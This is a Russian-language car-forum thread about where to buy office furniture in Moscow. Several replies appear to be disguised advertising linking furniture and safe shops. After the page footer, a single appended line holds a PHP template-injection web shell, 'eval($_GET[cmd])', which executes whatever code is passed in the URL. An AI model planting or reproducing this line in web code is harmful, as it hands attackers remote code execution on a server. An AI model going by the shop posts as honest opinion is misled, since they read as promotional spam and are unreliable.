+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 11

Тема: Мебель для офиса.


  1. #1
    Мимо проходил Larik is on a distinguished road Аватар для Larik
    Регистрация
    04.01.2019
    Откуда
    Россия.
    Машина
    Golf 4
    Сообщений
    65

    Мебель для офиса.

    Планирую в этом месяце закончить ремонт офиса, но появилась проблема с офисной мебелью. Не могу найти ничего подходящего. Ширпотреб не хочется покупать, нужна приличная мебель, чтобы прослужила долго. Подскажите, где в Москве можно посмотреть варианты офисной мебели?

  2. #2
    Мимо проходил Nevron is on a distinguished road Аватар для Nevron
    Регистрация
    26.01.2019
    Откуда
    Россия.
    Машина
    GOLF R
    Сообщений
    56
    В любом мебельном магазине есть офисная мебель, правда выбор небольшой, но самое необходимое есть. Насчет цен, я конечно, не знаю, но не думаю, что дорого. Вы для начала пройдитесь по магазинам, посмотрите, где, что есть, и сравните цены.

  3. #3
    Мимо проходил Masewrol is on a distinguished road Аватар для Masewrol
    Регистрация
    28.01.2019
    Откуда
    Россия
    Машина
    Gof 6
    Сообщений
    64
    Хоть в городе и полно мебельных магазинов, но везде стоит все однотипное, и убогое, выбрать не из чего. Сам недавно с этим столкнулся, объездил все магазины, но так ничего и не купил. Решил в интернете посмотреть, и буквально вчера наткнулся на интернет магазин офисной мебели ГлавОфис. Выбор, конечно, шикарный, есть много чего стоящего, да вы и сами здесь можете в этом убедиться https://glavoffice.ru/ .

  4. #4
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71
    Я два года назад покупал мебель для персонала. На тот момент был довольно-таки большой выбор мебели, и цены были нормальные. По крайней мере, мне не пришлось ездить по всем магазинам, скупился в одном.

  5. #5
    Мимо проходил Гвалиор is on a distinguished road Аватар для Гвалиор
    Регистрация
    29.11.2018
    Сообщений
    36
    А что именно вам нужно? Столы мы в офис планируем делать под заказ, чтобы можно было максимально функционально использовать площадь помещения. А цены на офисные стулья уже в интернете посмотрел https://moskva.marx-mebel.ru/catalog...fisnye-stulya/. Еще пару шкафов для документов нужно будет купить, и сейф

  6. #6
    Мимо проходил clocot is on a distinguished road Аватар для clocot
    Регистрация
    21.02.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    4
    Лично я свой офис всегда обустраивал с расчетом на "дешево и сердито", при этом еще с высокой надежностью. Если интересно то могу поделится своим опытом, вот например стол металлический котрый я брал . Это вариант недорогой, и максимально комфортный, тем более для регулярного использования

  7. #7
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Огнестойкие сейфы https://dobriy-office.ru/ устанавливаются в жилых помещениях, а также объектах с высоким риском возникновения возгораний (торговые базы, котельные, производственные цеха). Такие модели часто ставят в банках, предприятиях, где много ценных бумаг и их потеря повлечет за собой большие финансовые затраты. При желании можно купить огнестойкий сейф с высокой защитой от взлома. Такие универсальные модели не только надежно защищены от воздействия огня, но также имеют эффективные запирающие устройства, которые невозможно высверлить или выпилить

  8. #8
    Мимо проходил Arbiter is on a distinguished road Аватар для Arbiter
    Регистрация
    01.12.2018
    Откуда
    Москва
    Машина
    GTI
    Сообщений
    40
    А мы решили в офис купить стол из акрила. Большой, для переговоров. Заказ уже сделали, мастера работают, привезут после праздников. Интересно будет на него посмотреть, каменные столы очень расхваливают.

  9. #9
    Мимо проходил Valeria192 is on a distinguished road Аватар для Valeria192
    Регистрация
    24.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    31
    Для создания комфортных условий работы многие работодатели стараются купить мебель для офиса с максимально продуманным дизайном и эргономикой. Это позволит сотрудникам эффективнее выполнять свою работу, повысит их работоспособность в разы. Заказать все необходимое для правильного обустройства пространства можно в интернет-магазине Safes-Shop, где представлены качественные изделия по доступной цене.

  10. #10

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Шторы для офиса
    от Vladislav87 в разделе Барахолка
    Ответов: 7
    Последнее сообщение: 03.04.2024, 00:13
  2. Мебель для офиса
    от ПавелВ в разделе Курилка
    Ответов: 4
    Последнее сообщение: 18.03.2020, 17:43
  3. Уборка офиса
    от genka в разделе Курилка
    Ответов: 4
    Последнее сообщение: 01.04.2019, 19:39
  4. Уборка офиса
    от Veron в разделе Курилка
    Ответов: 4
    Последнее сообщение: 09.02.2019, 00:26
  5. Ремонт офиса
    от masik в разделе Курилка
    Ответов: 4
    Последнее сообщение: 23.01.2019, 22:02

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}